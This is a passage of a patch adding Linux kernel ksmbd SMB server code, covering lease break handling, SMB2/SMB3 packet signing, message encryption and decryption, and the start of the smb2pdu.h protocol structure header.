++			    req->LeaseState, lease->new_state);
++		goto err_out;
++	}
++
++	if (!atomic_read(&opinfo->breaking_cnt)) {
++		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
++		goto err_out;
++	}
++
++	/* check for bad lease state */
++	if (req->LeaseState &
++	    (~(SMB2_LEASE_READ_CACHING_LE | SMB2_LEASE_HANDLE_CACHING_LE))) {
++		err = STATUS_INVALID_OPLOCK_PROTOCOL;
++		if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++			lease_change_type = OPLOCK_WRITE_TO_NONE;
++		else
++			lease_change_type = OPLOCK_READ_TO_NONE;
++		ksmbd_debug(OPLOCK, "handle bad lease state 0x%x -> 0x%x\n",
++			    le32_to_cpu(lease->state),
++			    le32_to_cpu(req->LeaseState));
++	} else if (lease->state == SMB2_LEASE_READ_CACHING_LE &&
++		   req->LeaseState != SMB2_LEASE_NONE_LE) {
++		err = STATUS_INVALID_OPLOCK_PROTOCOL;
++		lease_change_type = OPLOCK_READ_TO_NONE;
++		ksmbd_debug(OPLOCK, "handle bad lease state 0x%x -> 0x%x\n",
++			    le32_to_cpu(lease->state),
++			    le32_to_cpu(req->LeaseState));
++	} else {
++		/* valid lease state changes */
++		err = STATUS_INVALID_DEVICE_STATE;
++		if (req->LeaseState == SMB2_LEASE_NONE_LE) {
++			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++				lease_change_type = OPLOCK_WRITE_TO_NONE;
++			else
++				lease_change_type = OPLOCK_READ_TO_NONE;
++		} else if (req->LeaseState & SMB2_LEASE_READ_CACHING_LE) {
++			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++				lease_change_type = OPLOCK_WRITE_TO_READ;
++			else
++				lease_change_type = OPLOCK_READ_HANDLE_TO_READ;
++		} else {
++			lease_change_type = 0;
++		}
++	}
++
++	switch (lease_change_type) {
++	case OPLOCK_WRITE_TO_READ:
++		ret = opinfo_write_to_read(opinfo);
++		break;
++	case OPLOCK_READ_HANDLE_TO_READ:
++		ret = opinfo_read_handle_to_read(opinfo);
++		break;
++	case OPLOCK_WRITE_TO_NONE:
++		ret = opinfo_write_to_none(opinfo);
++		break;
++	case OPLOCK_READ_TO_NONE:
++		ret = opinfo_read_to_none(opinfo);
++		break;
++	default:
++		ksmbd_debug(OPLOCK, "unknown lease change 0x%x -> 0x%x\n",
++			    le32_to_cpu(lease->state),
++			    le32_to_cpu(req->LeaseState));
++	}
++
++	lease_state = lease->state;
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	wake_up_interruptible_all(&opinfo->oplock_q);
++	atomic_dec(&opinfo->breaking_cnt);
++	wake_up_interruptible_all(&opinfo->oplock_brk);
++	opinfo_put(opinfo);
++
++	if (ret < 0) {
++		rsp->hdr.Status = err;
++		goto err_out;
++	}
++
++	rsp->StructureSize = cpu_to_le16(36);
++	rsp->Reserved = 0;
++	rsp->Flags = 0;
++	memcpy(rsp->LeaseKey, req->LeaseKey, 16);
++	rsp->LeaseState = lease_state;
++	rsp->LeaseDuration = 0;
++	inc_rfc1001_len(work->response_buf, 36);
++	return;
++
++err_out:
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	wake_up_interruptible_all(&opinfo->oplock_q);
++	atomic_dec(&opinfo->breaking_cnt);
++	wake_up_interruptible_all(&opinfo->oplock_brk);
++
++	opinfo_put(opinfo);
++	smb2_set_err_rsp(work);
++}
++
++/**
++ * smb2_oplock_break() - dispatcher for smb2.0 and 2.1 oplock/lease break
++ * @work:	smb work containing oplock/lease break command buffer
++ *
++ * Return:	0
++ */
++int smb2_oplock_break(struct ksmbd_work *work)
++{
++	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
++	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
++
++	switch (le16_to_cpu(req->StructureSize)) {
++	case OP_BREAK_STRUCT_SIZE_20:
++		smb20_oplock_break_ack(work);
++		break;
++	case OP_BREAK_STRUCT_SIZE_21:
++		smb21_lease_break_ack(work);
++		break;
++	default:
++		ksmbd_debug(OPLOCK, "invalid break cmd %d\n",
++			    le16_to_cpu(req->StructureSize));
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		smb2_set_err_rsp(work);
++	}
++
++	return 0;
++}
++
++/**
++ * smb2_notify() - handler for smb2 notify request
++ * @work:   smb work containing notify command buffer
++ *
++ * Return:      0
++ */
++int smb2_notify(struct ksmbd_work *work)
++{
++	struct smb2_change_notify_req *req;
++	struct smb2_change_notify_rsp *rsp;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (work->next_smb2_rcv_hdr_off && req->hdr.NextCommand) {
++		rsp->hdr.Status = STATUS_INTERNAL_ERROR;
++		smb2_set_err_rsp(work);
++		return 0;
++	}
++
++	smb2_set_err_rsp(work);
++	rsp->hdr.Status = STATUS_NOT_IMPLEMENTED;
++	return 0;
++}
++
++/**
++ * smb2_is_sign_req() - handler for checking packet signing status
++ * @work:	smb work containing notify command buffer
++ * @command:	SMB2 command id
++ *
++ * Return:	true if packed is signed, false otherwise
++ */
++bool smb2_is_sign_req(struct ksmbd_work *work, unsigned int command)
++{
++	struct smb2_hdr *rcv_hdr2 = smb2_get_msg(work->request_buf);
++
++	if ((rcv_hdr2->Flags & SMB2_FLAGS_SIGNED) &&
++	    command != SMB2_NEGOTIATE_HE &&
++	    command != SMB2_SESSION_SETUP_HE &&
++	    command != SMB2_OPLOCK_BREAK_HE)
++		return true;
++
++	return false;
++}
++
++/**
++ * smb2_check_sign_req() - handler for req packet sign processing
++ * @work:   smb work containing notify command buffer
++ *
++ * Return:	1 on success, 0 otherwise
++ */
++int smb2_check_sign_req(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr;
++	char signature_req[SMB2_SIGNATURE_SIZE];
++	char signature[SMB2_HMACSHA256_SIZE];
++	struct kvec iov[1];
++	size_t len;
++
++	hdr = smb2_get_msg(work->request_buf);
++	if (work->next_smb2_rcv_hdr_off)
++		hdr = ksmbd_req_buf_next(work);
++
++	if (!hdr->NextCommand && !work->next_smb2_rcv_hdr_off)
++		len = get_rfc1002_len(work->request_buf);
++	else if (hdr->NextCommand)
++		len = le32_to_cpu(hdr->NextCommand);
++	else
++		len = get_rfc1002_len(work->request_buf) -
++			work->next_smb2_rcv_hdr_off;
++
++	memcpy(signature_req, hdr->Signature, SMB2_SIGNATURE_SIZE);
++	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++
++	iov[0].iov_base = (char *)&hdr->ProtocolId;
++	iov[0].iov_len = len;
++
++	if (ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, 1,
++				signature))
++		return 0;
++
++	if (memcmp(signature, signature_req, SMB2_SIGNATURE_SIZE)) {
++		pr_err("bad smb2 signature\n");
++		return 0;
++	}
++
++	return 1;
++}
++
++/**
++ * smb2_set_sign_rsp() - handler for rsp packet sign processing
++ * @work:   smb work containing notify command buffer
++ *
++ */
++void smb2_set_sign_rsp(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr;
++	struct smb2_hdr *req_hdr;
++	char signature[SMB2_HMACSHA256_SIZE];
++	struct kvec iov[2];
++	size_t len;
++	int n_vec = 1;
++
++	hdr = smb2_get_msg(work->response_buf);
++	if (work->next_smb2_rsp_hdr_off)
++		hdr = ksmbd_resp_buf_next(work);
++
++	req_hdr = ksmbd_req_buf_next(work);
++
++	if (!work->next_smb2_rsp_hdr_off) {
++		len = get_rfc1002_len(work->response_buf);
++		if (req_hdr->NextCommand)
++			len = ALIGN(len, 8);
++	} else {
++		len = get_rfc1002_len(work->response_buf) -
++			work->next_smb2_rsp_hdr_off;
++		len = ALIGN(len, 8);
++	}
++
++	if (req_hdr->NextCommand)
++		hdr->NextCommand = cpu_to_le32(len);
++
++	hdr->Flags |= SMB2_FLAGS_SIGNED;
++	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++
++	iov[0].iov_base = (char *)&hdr->ProtocolId;
++	iov[0].iov_len = len;
++
++	if (work->aux_payload_sz) {
++		iov[0].iov_len -= work->aux_payload_sz;
++
++		iov[1].iov_base = work->aux_payload_buf;
++		iov[1].iov_len = work->aux_payload_sz;
++		n_vec++;
++	}
++
++	if (!ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, n_vec,
++				 signature))
++		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
++}
++
++/**
++ * smb3_check_sign_req() - handler for req packet sign processing
++ * @work:   smb work containing notify command buffer
++ *
++ * Return:	1 on success, 0 otherwise
++ */
++int smb3_check_sign_req(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	char *signing_key;
++	struct smb2_hdr *hdr;
++	struct channel *chann;
++	char signature_req[SMB2_SIGNATURE_SIZE];
++	char signature[SMB2_CMACAES_SIZE];
++	struct kvec iov[1];
++	size_t len;
++
++	hdr = smb2_get_msg(work->request_buf);
++	if (work->next_smb2_rcv_hdr_off)
++		hdr = ksmbd_req_buf_next(work);
++
++	if (!hdr->NextCommand && !work->next_smb2_rcv_hdr_off)
++		len = get_rfc1002_len(work->request_buf);
++	else if (hdr->NextCommand)
++		len = le32_to_cpu(hdr->NextCommand);
++	else
++		len = get_rfc1002_len(work->request_buf) -
++			work->next_smb2_rcv_hdr_off;
++
++	if (le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
++		signing_key = work->sess->smb3signingkey;
++	} else {
++		chann = lookup_chann_list(work->sess, conn);
++		if (!chann) {
++			return 0;
++		}
++		signing_key = chann->smb3signingkey;
++	}
++
++	if (!signing_key) {
++		pr_err("SMB3 signing key is not generated\n");
++		return 0;
++	}
++
++	memcpy(signature_req, hdr->Signature, SMB2_SIGNATURE_SIZE);
++	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++	iov[0].iov_base = (char *)&hdr->ProtocolId;
++	iov[0].iov_len = len;
++
++	if (ksmbd_sign_smb3_pdu(conn, signing_key, iov, 1, signature))
++		return 0;
++
++	if (memcmp(signature, signature_req, SMB2_SIGNATURE_SIZE)) {
++		pr_err("bad smb2 signature\n");
++		return 0;
++	}
++
++	return 1;
++}
++
++/**
++ * smb3_set_sign_rsp() - handler for rsp packet sign processing
++ * @work:   smb work containing notify command buffer
++ *
++ */
++void smb3_set_sign_rsp(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_hdr *req_hdr, *hdr;
++	struct channel *chann;
++	char signature[SMB2_CMACAES_SIZE];
++	struct kvec iov[2];
++	int n_vec = 1;
++	size_t len;
++	char *signing_key;
++
++	hdr = smb2_get_msg(work->response_buf);
++	if (work->next_smb2_rsp_hdr_off)
++		hdr = ksmbd_resp_buf_next(work);
++
++	req_hdr = ksmbd_req_buf_next(work);
++
++	if (!work->next_smb2_rsp_hdr_off) {
++		len = get_rfc1002_len(work->response_buf);
++		if (req_hdr->NextCommand)
++			len = ALIGN(len, 8);
++	} else {
++		len = get_rfc1002_len(work->response_buf) -
++			work->next_smb2_rsp_hdr_off;
++		len = ALIGN(len, 8);
++	}
++
++	if (conn->binding == false &&
++	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
++		signing_key = work->sess->smb3signingkey;
++	} else {
++		chann = lookup_chann_list(work->sess, work->conn);
++		if (!chann) {
++			return;
++		}
++		signing_key = chann->smb3signingkey;
++	}
++
++	if (!signing_key)
++		return;
++
++	if (req_hdr->NextCommand)
++		hdr->NextCommand = cpu_to_le32(len);
++
++	hdr->Flags |= SMB2_FLAGS_SIGNED;
++	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++	iov[0].iov_base = (char *)&hdr->ProtocolId;
++	iov[0].iov_len = len;
++	if (work->aux_payload_sz) {
++		iov[0].iov_len -= work->aux_payload_sz;
++		iov[1].iov_base = work->aux_payload_buf;
++		iov[1].iov_len = work->aux_payload_sz;
++		n_vec++;
++	}
++
++	if (!ksmbd_sign_smb3_pdu(conn, signing_key, iov, n_vec, signature))
++		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
++}
++
++/**
++ * smb3_preauth_hash_rsp() - handler for computing preauth hash on response
++ * @work:   smb work containing response buffer
++ *
++ */
++void smb3_preauth_hash_rsp(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct smb2_hdr *req, *rsp;
++
++	if (conn->dialect != SMB311_PROT_ID)
++		return;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (le16_to_cpu(req->Command) == SMB2_NEGOTIATE_HE &&
++	    conn->preauth_info)
++		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
++						 conn->preauth_info->Preauth_HashValue);
++
++	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE && sess) {
++		__u8 *hash_value;
++
++		if (conn->binding) {
++			struct preauth_session *preauth_sess;
++
++			preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
++			if (!preauth_sess)
++				return;
++			hash_value = preauth_sess->Preauth_HashValue;
++		} else {
++			hash_value = sess->Preauth_HashValue;
++			if (!hash_value)
++				return;
++		}
++		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
++						 hash_value);
++	}
++}
++
++static void fill_transform_hdr(void *tr_buf, char *old_buf, __le16 cipher_type)
++{
++	struct smb2_transform_hdr *tr_hdr = tr_buf + 4;
++	struct smb2_hdr *hdr = smb2_get_msg(old_buf);
++	unsigned int orig_len = get_rfc1002_len(old_buf);
++
++	/* tr_buf must be cleared by the caller */
++	tr_hdr->ProtocolId = SMB2_TRANSFORM_PROTO_NUM;
++	tr_hdr->OriginalMessageSize = cpu_to_le32(orig_len);
++	tr_hdr->Flags = cpu_to_le16(TRANSFORM_FLAG_ENCRYPTED);
++	if (cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
++	    cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
++	else
++		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
++	memcpy(&tr_hdr->SessionId, &hdr->SessionId, 8);
++	inc_rfc1001_len(tr_buf, sizeof(struct smb2_transform_hdr));
++	inc_rfc1001_len(tr_buf, orig_len);
++}
++
++int smb3_encrypt_resp(struct ksmbd_work *work)
++{
++	char *buf = work->response_buf;
++	struct kvec iov[3];
++	int rc = -ENOMEM;
++	int buf_size = 0, rq_nvec = 2 + (work->aux_payload_sz ? 1 : 0);
++
++	if (ARRAY_SIZE(iov) < rq_nvec)
++		return -ENOMEM;
++
++	work->tr_buf = kzalloc(sizeof(struct smb2_transform_hdr) + 4, GFP_KERNEL);
++	if (!work->tr_buf)
++		return rc;
++
++	/* fill transform header */
++	fill_transform_hdr(work->tr_buf, buf, work->conn->cipher_type);
++
++	iov[0].iov_base = work->tr_buf;
++	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
++	buf_size += iov[0].iov_len - 4;
++
++	iov[1].iov_base = buf + 4;
++	iov[1].iov_len = get_rfc1002_len(buf);
++	if (work->aux_payload_sz) {
++		iov[1].iov_len = work->resp_hdr_sz - 4;
++
++		iov[2].iov_base = work->aux_payload_buf;
++		iov[2].iov_len = work->aux_payload_sz;
++		buf_size += iov[2].iov_len;
++	}
++	buf_size += iov[1].iov_len;
++	work->resp_hdr_sz = iov[1].iov_len;
++
++	rc = ksmbd_crypt_message(work, iov, rq_nvec, 1);
++	if (rc)
++		return rc;
++
++	memmove(buf, iov[1].iov_base, iov[1].iov_len);
++	*(__be32 *)work->tr_buf = cpu_to_be32(buf_size);
++
++	return rc;
++}
++
++bool smb3_is_transform_hdr(void *buf)
++{
++	struct smb2_transform_hdr *trhdr = smb2_get_msg(buf);
++
++	return trhdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM;
++}
++
++int smb3_decrypt_req(struct ksmbd_work *work)
++{
++	struct ksmbd_session *sess;
++	char *buf = work->request_buf;
++	unsigned int pdu_length = get_rfc1002_len(buf);
++	struct kvec iov[2];
++	int buf_data_size = pdu_length - sizeof(struct smb2_transform_hdr);
++	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(buf);
++	int rc = 0;
++
++	if (buf_data_size < sizeof(struct smb2_hdr)) {
++		pr_err("Transform message is too small (%u)\n",
++		       pdu_length);
++		return -ECONNABORTED;
++	}
++
++	if (buf_data_size < le32_to_cpu(tr_hdr->OriginalMessageSize)) {
++		pr_err("Transform message is broken\n");
++		return -ECONNABORTED;
++	}
++
++	sess = ksmbd_session_lookup_all(work->conn, le64_to_cpu(tr_hdr->SessionId));
++	if (!sess) {
++		pr_err("invalid session id(%llx) in transform header\n",
++		       le64_to_cpu(tr_hdr->SessionId));
++		return -ECONNABORTED;
++	}
++
++	iov[0].iov_base = buf;
++	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
++	iov[1].iov_base = buf + sizeof(struct smb2_transform_hdr) + 4;
++	iov[1].iov_len = buf_data_size;
++	rc = ksmbd_crypt_message(work, iov, 2, 0);
++	if (rc)
++		return rc;
++
++	memmove(buf + 4, iov[1].iov_base, buf_data_size);
++	*(__be32 *)buf = cpu_to_be32(buf_data_size);
++
++	return rc;
++}
++
++bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct smb2_hdr *rsp = smb2_get_msg(work->response_buf);
++
++	if (conn->dialect < SMB30_PROT_ID)
++		return false;
++
++	if (work->next_smb2_rcv_hdr_off)
++		rsp = ksmbd_resp_buf_next(work);
++
++	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE &&
++	    sess->user && !user_guest(sess->user) &&
++	    rsp->Status == STATUS_SUCCESS)
++		return true;
++	return false;
++}
+diff --git a/fs/smb/server/smb2pdu.h b/fs/smb/server/smb2pdu.h
+new file mode 100644
+index 0000000000000..dd10f8031606b
+--- /dev/null
++++ b/fs/smb/server/smb2pdu.h
+@@ -0,0 +1,536 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef _SMB2PDU_H
++#define _SMB2PDU_H
++
++#include "ntlmssp.h"
++#include "smbacl.h"
++
++/*Create Action Flags*/
++#define FILE_SUPERSEDED                0x00000000
++#define FILE_OPENED            0x00000001
++#define FILE_CREATED           0x00000002
++#define FILE_OVERWRITTEN       0x00000003
++
++/* SMB2 Max Credits */
++#define SMB2_MAX_CREDITS		8192
++
++/* BB FIXME - analyze following length BB */
++#define MAX_SMB2_HDR_SIZE 0x78 /* 4 len + 64 hdr + (2*24 wct) + 2 bct + 2 pad */
++
++#define SMB21_DEFAULT_IOSIZE	(1024 * 1024)
++#define SMB3_DEFAULT_TRANS_SIZE	(1024 * 1024)
++#define SMB3_MIN_IOSIZE		(64 * 1024)
++#define SMB3_MAX_IOSIZE		(8 * 1024 * 1024)
++#define SMB3_MAX_MSGSIZE	(4 * 4096)
++
++/*
++ *	Definitions for SMB2 Protocol Data Units (network frames)
++ *
++ *  See MS-SMB2.PDF specification for protocol details.
++ *  The Naming convention is the lower case version of the SMB2
++ *  command code name for the struct. Note that structures must be packed.
++ *
++ */
++
++struct preauth_integrity_info {
++	/* PreAuth integrity Hash ID */
++	__le16			Preauth_HashId;
++	/* PreAuth integrity Hash Value */
++	__u8			Preauth_HashValue[SMB2_PREAUTH_HASH_SIZE];
++};
++
++/* offset is sizeof smb2_negotiate_rsp but rounded up to 8 bytes. */
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++/* sizeof(struct smb2_negotiate_rsp) =
++ * header(64) + response(64) + GSS_LENGTH(96) + GSS_PADDING(0)
++ */
++#define OFFSET_OF_NEG_CONTEXT	0xe0
++#else
++/* sizeof(struct smb2_negotiate_rsp) =
++ * header(64) + response(64) + GSS_LENGTH(74) + GSS_PADDING(6)
++ */
++#define OFFSET_OF_NEG_CONTEXT	0xd0
++#endif
++
++#define SMB2_SESSION_EXPIRED		(0)
++#define SMB2_SESSION_IN_PROGRESS	BIT(0)
++#define SMB2_SESSION_VALID		BIT(1)
++
++#define SMB2_SESSION_TIMEOUT		(10 * HZ)
++
++struct create_durable_req_v2 {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le32 Timeout;
++	__le32 Flags;
++	__u8 Reserved[8];
++	__u8 CreateGuid[16];
++} __packed;
++
++struct create_durable_reconn_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	union {
++		__u8  Reserved[16];
++		struct {
++			__u64 PersistentFileId;
++			__u64 VolatileFileId;
++		} Fid;
++	} Data;
++} __packed;
++
++struct create_durable_reconn_v2_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct {
++		__u64 PersistentFileId;
++		__u64 VolatileFileId;
++	} Fid;
++	__u8 CreateGuid[16];
++	__le32 Flags;
++} __packed;
++
++struct create_app_inst_id {
++	struct create_context ccontext;
++	__u8 Name[8];
++	__u8 Reserved[8];
++	__u8 AppInstanceId[16];
++} __packed;
++
++struct create_app_inst_id_vers {
++	struct create_context ccontext;
++	__u8 Name[8];
++	__u8 Reserved[2];
++	__u8 Padding[4];
++	__le64 AppInstanceVersionHigh;
++	__le64 AppInstanceVersionLow;
++} __packed;
++
++struct create_mxac_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le64 Timestamp;
++} __packed;
++
++struct create_alloc_size_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le64 AllocationSize;
++} __packed;
++
++struct create_durable_rsp {
++	struct create_context ccontext;
++	__u8   Name[8];
++	union {
++		__u8  Reserved[8];
++		__u64 data;
++	} Data;
++} __packed;
++
++struct create_durable_v2_rsp {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le32 Timeout;
++	__le32 Flags;
++} __packed;
++
++struct create_mxac_rsp {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le32 QueryStatus;
++	__le32 MaximalAccess;
++} __packed;
++
++struct create_disk_id_rsp {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le64 DiskFileId;
++	__le64 VolumeId;
++	__u8  Reserved[16];
++} __packed;
++
++/* equivalent of the contents of SMB3.1.1 POSIX open context response */
++struct create_posix_rsp {
++	struct create_context ccontext;
++	__u8    Name[16];
++	__le32 nlink;
++	__le32 reparse_tag;
++	__le32 mode;
++	/* SidBuffer contain two sids(Domain sid(28), UNIX group sid(16)) */
++	u8 SidBuffer[44];
++} __packed;
++
++struct smb2_buffer_desc_v1 {
++	__le64 offset;
++	__le32 token;
++	__le32 length;
++} __packed;
++
++#define SMB2_0_IOCTL_IS_FSCTL 0x00000001
++
++struct smb_sockaddr_in {
++	__be16 Port;
++	__be32 IPv4address;
++	__u8 Reserved[8];
++} __packed;
++
++struct smb_sockaddr_in6 {
++	__be16 Port;
++	__be32 FlowInfo;
++	__u8 IPv6address[16];
++	__be32 ScopeId;
++} __packed;
++
++#define INTERNETWORK	0x0002
++#define INTERNETWORKV6	0x0017
++
++struct sockaddr_storage_rsp {
++	__le16 Family;
++	union {
++		struct smb_sockaddr_in addr4;
++		struct smb_sockaddr_in6 addr6;
++	};
++} __packed;
++
++#define RSS_CAPABLE	0x00000001
++#define RDMA_CAPABLE	0x00000002
++
++struct network_interface_info_ioctl_rsp {
++	__le32 Next; /* next interface. zero if this is last one */
++	__le32 IfIndex;
++	__le32 Capability; /* RSS or RDMA Capable */
++	__le32 Reserved;
++	__le64 LinkSpeed;
++	char	SockAddr_Storage[128];
++} __packed;
++
++struct file_object_buf_type1_ioctl_rsp {
++	__u8 ObjectId[16];
++	__u8 BirthVolumeId[16];
++	__u8 BirthObjectId[16];
++	__u8 DomainId[16];
++} __packed;
++
++struct resume_key_ioctl_rsp {
++	__u64 ResumeKey[3];
++	__le32 ContextLength;
++	__u8 Context[4]; /* ignored, Windows sets to 4 bytes of zero */
++} __packed;
++
++struct copychunk_ioctl_req {
++	__le64 ResumeKey[3];
++	__le32 ChunkCount;
++	__le32 Reserved;
++	__u8 Chunks[1]; /* array of srv_copychunk */
++} __packed;
++
++struct srv_copychunk {
++	__le64 SourceOffset;
++	__le64 TargetOffset;
++	__le32 Length;
++	__le32 Reserved;
++} __packed;
++
++struct copychunk_ioctl_rsp {
++	__le32 ChunksWritten;
++	__le32 ChunkBytesWritten;
++	__le32 TotalBytesWritten;
++} __packed;
++
++struct file_sparse {
++	__u8	SetSparse;
++} __packed;
++
++/* FILE Info response size */
++#define FILE_DIRECTORY_INFORMATION_SIZE       1
++#define FILE_FULL_DIRECTORY_INFORMATION_SIZE  2
++#define FILE_BOTH_DIRECTORY_INFORMATION_SIZE  3
++#define FILE_BASIC_INFORMATION_SIZE           40
++#define FILE_STANDARD_INFORMATION_SIZE        24
++#define FILE_INTERNAL_INFORMATION_SIZE        8
++#define FILE_EA_INFORMATION_SIZE              4
++#define FILE_ACCESS_INFORMATION_SIZE          4
++#define FILE_NAME_INFORMATION_SIZE            9
++#define FILE_RENAME_INFORMATION_SIZE          10
++#define FILE_LINK_INFORMATION_SIZE            11
++#define FILE_NAMES_INFORMATION_SIZE           12
++#define FILE_DISPOSITION_INFORMATION_SIZE     13
++#define FILE_POSITION_INFORMATION_SIZE        14
++#define FILE_FULL_EA_INFORMATION_SIZE         15
++#define FILE_MODE_INFORMATION_SIZE            4
++#define FILE_ALIGNMENT_INFORMATION_SIZE       4
++#define FILE_ALL_INFORMATION_SIZE             104
++#define FILE_ALLOCATION_INFORMATION_SIZE      19
++#define FILE_END_OF_FILE_INFORMATION_SIZE     20
++#define FILE_ALTERNATE_NAME_INFORMATION_SIZE  8
++#define FILE_STREAM_INFORMATION_SIZE          32
++#define FILE_PIPE_INFORMATION_SIZE            23
++#define FILE_PIPE_LOCAL_INFORMATION_SIZE      24
++#define FILE_PIPE_REMOTE_INFORMATION_SIZE     25
++#define FILE_MAILSLOT_QUERY_INFORMATION_SIZE  26
++#define FILE_MAILSLOT_SET_INFORMATION_SIZE    27
++#define FILE_COMPRESSION_INFORMATION_SIZE     16
++#define FILE_OBJECT_ID_INFORMATION_SIZE       29
++/* Number 30 not defined in documents */
++#define FILE_MOVE_CLUSTER_INFORMATION_SIZE    31
++#define FILE_QUOTA_INFORMATION_SIZE           32
++#define FILE_REPARSE_POINT_INFORMATION_SIZE   33
++#define FILE_NETWORK_OPEN_INFORMATION_SIZE    56
++#define FILE_ATTRIBUTE_TAG_INFORMATION_SIZE   8
++
++/* FS Info response  size */
++#define FS_DEVICE_INFORMATION_SIZE     8
++#define FS_ATTRIBUTE_INFORMATION_SIZE  16
++#define FS_VOLUME_INFORMATION_SIZE     24
++#define FS_SIZE_INFORMATION_SIZE       24
++#define FS_FULL_SIZE_INFORMATION_SIZE  32
++#define FS_SECTOR_SIZE_INFORMATION_SIZE 28
++#define FS_OBJECT_ID_INFORMATION_SIZE 64
++#define FS_CONTROL_INFORMATION_SIZE 48
++#define FS_POSIX_INFORMATION_SIZE 56
++
++/* FS_ATTRIBUTE_File_System_Name */
++#define FS_TYPE_SUPPORT_SIZE   44
++struct fs_type_info {
++	char		*fs_name;
++	long		magic_number;
++} __packed;
++
++/*
++ *	PDU query infolevel structure definitions
++ *	BB consider moving to a different header
++ */
++
++struct smb2_file_access_info {
++	__le32 AccessFlags;
++} __packed;
++
++struct smb2_file_alignment_info {
++	__le32 AlignmentRequirement;
++} __packed;
++
++struct smb2_file_basic_info { /* data block encoding of response to level 18 */
++	__le64 CreationTime;	/* Beginning of FILE_BASIC_INFO equivalent */
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 Attributes;
++	__u32  Pad1;		/* End of FILE_BASIC_INFO_INFO equivalent */
++} __packed;
++
++struct smb2_file_alt_name_info {
++	__le32 FileNameLength;
++	char FileName[];
++} __packed;
++
++struct smb2_file_stream_info {
++	__le32  NextEntryOffset;
++	__le32  StreamNameLength;
++	__le64 StreamSize;
++	__le64 StreamAllocationSize;
++	char   StreamName[];
++} __packed;
++
++struct smb2_file_ntwrk_info {
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le32 Attributes;
++	__le32 Reserved;
++} __packed;
++
++struct smb2_file_standard_info {
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le32 NumberOfLinks;	/* hard links */
++	__u8   DeletePending;
++	__u8   Directory;
++	__le16 Reserved;
++} __packed; /* level 18 Query */
++
++struct smb2_file_ea_info {
++	__le32 EASize;
++} __packed;
++
++struct smb2_file_alloc_info {
++	__le64 AllocationSize;
++} __packed;
++
++struct smb2_file_disposition_info {
++	__u8 DeletePending;
++} __packed;
++
++struct smb2_file_pos_info {
++	__le64 CurrentByteOffset;
++} __packed;
++
++#define FILE_MODE_INFO_MASK cpu_to_le32(0x0000100e)
++
++struct smb2_file_mode_info {
++	__le32 Mode;
++} __packed;
++
++#define COMPRESSION_FORMAT_NONE 0x0000
++#define COMPRESSION_FORMAT_LZNT1 0x0002
++
++struct smb2_file_comp_info {
++	__le64 CompressedFileSize;
++	__le16 CompressionFormat;
++	__u8 CompressionUnitShift;
++	__u8 ChunkShift;
++	__u8 ClusterShift;
++	__u8 Reserved[3];
++} __packed;
++
++struct smb2_file_attr_tag_info {
++	__le32 FileAttributes;
++	__le32 ReparseTag;
++} __packed;
++
++#define SL_RESTART_SCAN	0x00000001
++#define SL_RETURN_SINGLE_ENTRY	0x00000002
++#define SL_INDEX_SPECIFIED	0x00000004
++
++struct smb2_ea_info_req {
